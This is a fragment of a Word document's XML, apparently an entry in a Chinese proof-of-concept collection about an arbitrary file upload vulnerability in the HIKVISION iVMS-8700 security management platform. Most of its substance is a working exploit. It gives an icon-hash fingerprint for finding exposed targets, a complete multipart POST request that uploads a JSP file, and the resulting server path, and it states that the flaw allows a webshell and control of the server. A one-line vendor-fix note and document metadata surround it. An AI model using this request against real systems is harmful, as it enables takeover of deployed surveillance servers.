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HIKVISION 综合安防管理平台任意文件上传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HIKVISION iVMS-8700综合安防管理平台存在任意文件上传漏洞，攻击者通过发送特定的请求包可以上传Webshell文件控制服务器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icon_hash="-911494769"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30505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2626360"/>
            <wp:effectExtent l="0" t="0" r="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eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发送请求包上传文件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POST /eps/resourceOperations/upload.action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Host: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Cache-Control: max-age=0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Upgrade-Insecure-Requests: 1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User-Agent: MicroMessenger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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9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Accept-Language: zh-CN,zh;q=0.9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Cookie: ISMS_8700_Sessionname=CA0F207A6372FE883ACA78B74E6DC953; CAS-USERNAME=058; ISMS_8700_Sessionname=4D808BE7BE0E5C7047B9688E6009F710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Connection: close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Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj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Content-Length: 212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------WebKitFormBoundaryTJyhtTNqdMNLZLhj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Content-Disposition: form-data; name="fileUploader";filename="test.jsp"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Content-Type: image/jpeg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&lt;%out.print("hello");%&gt;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5265" cy="1806575"/>
            <wp:effectExtent l="0" t="0" r="825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/eps/upload/769badc8ef5944da804a4ca3c8ecafb0.jsp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1、产商已发布安全版本，请联系产商修复。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14FB6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0BE14F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AE142A2"/>
    <w:rsid w:val="1F381145"/>
    <w:rsid w:val="2C2672ED"/>
    <w:rsid w:val="7E6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2023-12-17T14:39:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-18T14:08:40Z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66C594E2D8854B0E859CA204B3DB8D95_12</vt:lpwstr>
  </property>
</Properties>
</file>